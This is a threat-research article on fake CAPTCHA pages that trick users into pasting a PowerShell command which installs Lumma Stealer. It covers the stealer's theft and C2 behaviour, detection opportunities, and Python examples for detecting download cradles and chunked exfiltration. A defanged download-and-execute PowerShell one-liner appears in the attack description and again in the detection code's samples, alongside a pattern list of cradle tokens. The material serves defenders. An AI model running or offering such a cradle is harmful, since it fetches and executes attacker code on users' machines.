A new social engineering technique has emerged that represents a concerning evolution in malware delivery: fake CAPTCHA verification pages that trick users into executing malicious commands on their own machines. The SenseOn Threat Research Team has tracked multiple campaigns using this technique to deploy Lumma Stealer, a sophisticated information-stealing malware that targets credentials, cryptocurrency wallets, browser data, and sensitive files.
This technique is particularly dangerous because it bypasses many traditional security controls. The user, not an exploit, not a macro, not a vulnerability, is the execution mechanism. The malicious command runs with the user's own privileges, initiated by the user's own actions.
The Attack Chain
Stage 1: The Lure
Victims encounter the fake CAPTCHA through several vectors. The most common is malvertising, malicious advertisements served through legitimate advertising networks that redirect users through a chain of traffic distribution systems (TDS). Other vectors include compromised websites, SEO-poisoned search results, and phishing emails that link to the fake verification page.
The landing page presents a convincing CAPTCHA verification dialogue. It mimics the visual design of legitimate CAPTCHA providers such as Google reCAPTCHA or Cloudflare Turnstile, complete with familiar branding elements, the checkbox interface, and verification messaging such as "Verify you are human" or "Please complete the security check."
Stage 2: Clipboard Manipulation
When the user clicks the fake CAPTCHA checkbox, the page executes JavaScript that silently copies a malicious command to the user's clipboard. The user sees a seemingly innocuous verification step: a dialogue instructing them to "complete verification" by pressing Windows+R to open the Run dialogue, pressing Ctrl+V to paste, and pressing Enter to confirm.
The instructions are presented as a standard anti-bot verification step, often accompanied by reassuring visual elements like progress bars, loading animations, and success indicators that mimic legitimate CAPTCHA flows.
Stage 3: User-Initiated Execution
The command copied to the clipboard is typically a PowerShell one-liner disguised as a verification string. When the user pastes and executes it, the command:
- Launches PowerShell with execution policy bypass flags
- Downloads a payload from attacker-controlled infrastructure, often using legitimate hosting services (GitHub, Discord CDN, Cloudflare Workers) to evade URL reputation filtering
- Executes the downloaded payload, which unpacks and installs Lumma Stealer
A simplified example of the clipboard payload:
powershell -w hidden -ep bypass -c "IEX(IWR('hxxps://cdn[.]example[.]com/verify.txt').Content)"
The actual commands observed in the wild use extensive obfuscation, including variable substitution, string reversal, base64 encoding within base64 encoding, and environment variable concatenation, to evade detection by security tools that inspect clipboard content or command-line arguments.
Stage 4: Lumma Stealer Deployment
The downloaded payload deploys Lumma Stealer through a multi-stage process designed to evade endpoint detection:
Process hollowing: The installer creates a legitimate Windows process (often RegAsm.exe, MSBuild.exe, or InstallUtil.exe) in a suspended state, replaces its memory contents with the Lumma Stealer payload, and resumes execution. This technique allows the malware to run under the guise of a trusted Microsoft binary.
Anti-analysis checks: Before executing its payload, Lumma Stealer checks for virtualised environments, debuggers, and security research tools. It queries system information (processor count, RAM size, disk size, recent file activity) to determine whether it is running in a sandbox.
Configuration decryption: Lumma Stealer's configuration, including C2 server addresses, targeted applications, and exfiltration parameters, is encrypted within the binary and decrypted at runtime using a key derived from system-specific values.
Lumma Stealer Capabilities
Lumma Stealer is a Malware-as-a-Service (MaaS) offering sold on underground forums and Telegram channels. Subscription prices range from approximately $250 to $1,000 per month depending on the tier, with higher tiers offering additional features such as custom builds, dedicated C2 infrastructure, and log processing services.
Its data theft capabilities are extensive:
Browser Data Harvesting
Lumma Stealer targets all major Chromium-based and Gecko-based browsers. It extracts saved passwords from browser credential stores, session cookies (enabling account takeover without knowing credentials), autofill data including payment card information, browsing history, and downloaded file records. It specifically targets cookies for high-value services including banking portals, email providers, social media platforms, and cloud services.
Cryptocurrency Wallet Theft
The stealer targets both browser extension wallets (MetaMask, Phantom, Coinbase Wallet, and over 30 others) and desktop wallet applications (Exodus, Atomic, Electrum, and similar). It extracts wallet files, private keys, and seed phrases, enabling direct theft of cryptocurrency assets.
Credential Store Extraction
Beyond browsers, Lumma Stealer harvests credentials from dedicated password managers, FTP clients (FileZilla, WinSCP), email clients (Outlook, Thunderbird), and VPN clients. It also extracts credentials from Windows Credential Manager and targets SSH keys stored in standard locations.
File Grabber
Configurable file grabbing functionality allows operators to specify file extensions, directories, and size limits for targeted file theft. Common targets include documents (PDF, DOCX, XLSX), key files (PEM, KEY, PFX), configuration files, and database files.
System Profiling
Lumma Stealer collects detailed system information including hardware identifiers, installed software inventories, running processes, network configuration, and screenshots. This information is packaged with stolen credentials and sold or used to help carry out further attacks.
Command-and-Control Communication
Lumma Stealer communicates with its C2 infrastructure using HTTPS POST requests to domains that rotate frequently. The C2 communication pattern includes:
Initial check-in: The stealer sends a POST request containing a unique bot identifier derived from hardware characteristics. The C2 server responds with the current configuration, including which data to target and where to exfiltrate.
Data exfiltration: Stolen data is compressed, encrypted, and exfiltrated via HTTPS POST requests. Large datasets are chunked into smaller uploads to avoid triggering data loss prevention (DLP) rules based on transfer size.
Domain rotation: C2 domains are registered in bulk and rotated frequently, often daily. Domains are typically registered through bulletproof hosting providers or using stolen identities. Some variants use domain generation algorithms (DGAs) to dynamically compute C2 addresses.
Dead drop resolvers: Recent variants use legitimate services (Steam profiles, Telegram channels, Pastebin) as dead drop resolvers; the stealer fetches the current C2 address from a profile page or channel description, providing resilience against domain takedowns.
Detection Opportunities
Despite the sophistication of this attack chain, multiple detection opportunities exist.
At the Social Engineering Stage
- Web content filtering: Block known fake CAPTCHA domains and pages that match the visual patterns used in these campaigns
- JavaScript analysis: Detect web pages that programmatically modify clipboard contents, particularly when the clipboard content contains PowerShell commands or encoded payloads
- User awareness: Train users to recognise that legitimate CAPTCHA systems never require opening the Run dialogue, executing commands, or interacting with system tools
At the Execution Stage
- PowerShell monitoring: Detect PowerShell execution initiated from the Windows Run dialogue (explorer.exe spawning powershell.exe) with download cradle patterns or execution policy bypass flags
- Command-line logging: Monitor for obfuscated PowerShell commands, particularly those containing IEX, Invoke-Expression, Net.WebClient, or base64-encoded content
- Clipboard monitoring: Detect clipboard contents that contain executable commands, particularly PowerShell or cmd.exe syntax
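The following added example (not SenseOn's code) shows how the download-cradle and bypass tokens from Stage 3 and the Run-dialogue parent/child relationship listed above can be checked over process-creation telemetry, including decoding a base64 -EncodedCommand layer before matching. The event shape is a simplified Sysmon-style construction, and the sample events, hosts and paths are constructed for the example.

```python
import base64
import re

# Constructed process-creation events in a simplified Sysmon Event ID 1 shape (not real telemetry).
# The second event hides its cradle in a base64 -enc argument, as obfuscated lures do.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"IEX(IWR('hxxps://cdn[.]example[.]com/verify.txt').Content)\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + base64.b64encode(
         "IEX(New-Object Net.WebClient).DownloadString('hxxps://cdn[.]example[.]com/v.txt')".encode("utf-16le")).decode()},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
]

# Download-cradle and policy-bypass tokens named in the detection guidance above.
CRADLE_PATTERNS = re.compile(
    r"\bIEX\b|Invoke-Expression|Net\.WebClient|DownloadString|Invoke-WebRequest|\bIWR\b"
    r"|-ep\s+bypass|-ExecutionPolicy\s+bypass|-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_event(event):
    """Cradle tokens plus an explorer.exe parent (the Run dialogue) is the high-severity pattern."""
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    child = event["Image"].lower().rsplit("\\", 1)[-1]
    if child not in ("powershell.exe", "pwsh.exe"):
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    text = event["CommandLine"] + ("\n" + decoded if decoded else "")  # match on the decoded layer too
    indicators = sorted({m.group(0).lower() for m in CRADLE_PATTERNS.finditer(text)})
    if not indicators:
        return None  # an explorer.exe parent alone is normal: Start menu launches look the same
    severity = "high" if parent == "explorer.exe" else "medium"
    return {"severity": severity, "parent": parent, "indicators": indicators, "decoded": decoded}

def scan(events):
    return [r for r in map(analyse_event, events) if r]
```

A -File launch from a developer tool produces no indicators and is not alerted, which is the false-positive case the explorer.exe check alone would not handle.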
At the Installation Stage
- Process injection detection: Monitor for process hollowing indicators: legitimate Windows binaries exhibiting unexpected network connections, file access patterns, or memory characteristics
- Behavioural analysis: Detect the combination of process creation, memory manipulation, and network connection that characterises process hollowing
- File system monitoring: Alert on the creation of suspicious files in user-writable directories, particularly executables or DLLs in temporary folders
At the Data Theft Stage
- Credential store access: Monitor for processes accessing browser credential databases, cookie stores, and Windows Credential Manager outside of the expected browser processes
- Cryptocurrency wallet access: Detect non-wallet processes accessing wallet files, extension data, or seed phrase storage locations
- Data exfiltration patterns: Identify HTTPS POST requests to recently registered or low-reputation domains containing compressed or encrypted payloads
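As an added example, not code from the original article, the following scores constructed proxy log lines for the chunked exfiltration pattern described in the Command-and-Control section: a per-request size rule sees only sub-limit chunks, whereas aggregating POST volume per client/host pair and weighting it by domain registration age (assumed to come from a WHOIS/RDAP enrichment lookup) surfaces it. The hosts, sizes, dates and the analysis date are constructed.

```python
from collections import defaultdict
from datetime import date, datetime

# Constructed proxy log lines (not real telemetry): time, client, host, method, bytes sent by the client.
PROXY_LOG = """\
2025-01-10T10:00:01 10.0.0.5 cdn.example-update.test POST 921600
2025-01-10T10:00:04 10.0.0.5 cdn.example-update.test POST 921600
2025-01-10T10:00:07 10.0.0.5 cdn.example-update.test POST 921600
2025-01-10T10:00:10 10.0.0.5 cdn.example-update.test POST 917504
2025-01-10T10:02:00 10.0.0.7 drive.example-office.test POST 6291456
"""

# Constructed registration dates standing in for a WHOIS/RDAP enrichment lookup (assumed data source).
DOMAIN_REGISTERED = {
    "cdn.example-update.test": date(2025, 1, 8),
    "drive.example-office.test": date(2019, 5, 2),
}
ANALYSIS_DATE = date(2025, 1, 10)        # constructed "today" for the sample

PER_REQUEST_DLP_LIMIT = 5 * 1024 * 1024  # what a naive size-only DLP rule keys on
AGGREGATE_LIMIT = 2 * 1024 * 1024        # total POST bytes per client/host pair
MIN_CHUNKS = 3                           # several uploads to the same host
MAX_DOMAIN_AGE_DAYS = 30                 # rotated C2 domains are young

def parse_log(text):
    rows = []
    for line in text.splitlines():
        ts, src, host, method, size = line.split()
        rows.append((datetime.fromisoformat(ts), src, host, method, int(size)))
    return rows

def size_only_rule(rows):
    """Naive per-request rule: fires only on single uploads above the DLP limit."""
    return sorted({(src, host) for _, src, host, m, size in rows if m == "POST" and size > PER_REQUEST_DLP_LIMIT})

def chunked_exfil_rule(rows, registered, today=ANALYSIS_DATE):
    """Aggregate POST volume per client/host pair and weigh it by domain age (production code would also bound the time window)."""
    totals = defaultdict(lambda: [0, 0])  # (bytes, chunk count)
    for _, src, host, method, size in rows:
        if method == "POST":
            totals[(src, host)][0] += size
            totals[(src, host)][1] += 1
    alerts = []
    for (src, host), (total, chunks) in sorted(totals.items()):
        age = (today - registered[host]).days if host in registered else 0  # unknown registration treated as brand new
        if chunks >= MIN_CHUNKS and total >= AGGREGATE_LIMIT and age <= MAX_DOMAIN_AGE_DAYS:
            alerts.append({"src": src, "host": host, "bytes": total, "chunks": chunks, "domain_age_days": age})
    return alerts
```

On the sample, the size-only rule fires on the single large upload to the long-registered domain and misses the four sub-limit chunks, while the aggregate rule flags only the chunked transfer to the two-day-old domain.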
SenseOn's Detection Approach
SenseOn's unified platform provides detection coverage across every stage of this attack chain. The cross-domain correlation engine correlates endpoint telemetry (PowerShell execution, process hollowing, credential store access) with network telemetry (C2 communication, data exfiltration) to build a complete attack narrative.
Critically, SenseOn's behavioural baselines detect the anomalous pattern of activity that characterises Lumma Stealer deployment: a user's browser session leading to PowerShell execution, followed by process injection, credential access, and outbound data transfer, as a cohesive attack sequence rather than isolated indicators. This contextual detection provides high confidence and low false positive rates even for novel variants that modify individual indicators.
Recommendations
Organisations should take the following defensive measures:
- Restrict PowerShell execution where possible using constrained language mode and application control policies
- Deploy endpoint detection capable of monitoring PowerShell command-line arguments and process ancestry chains
- Conduct user awareness training specifically addressing the fake CAPTCHA technique. Emphasise that no legitimate verification process requires executing commands
- Monitor credential store access and alert on non-standard processes accessing browser password databases and cookie stores
- Implement network detection for C2 communication patterns, including connections to recently registered domains and dead drop resolver services
- Restrict clipboard access via browser security policies where operationally feasible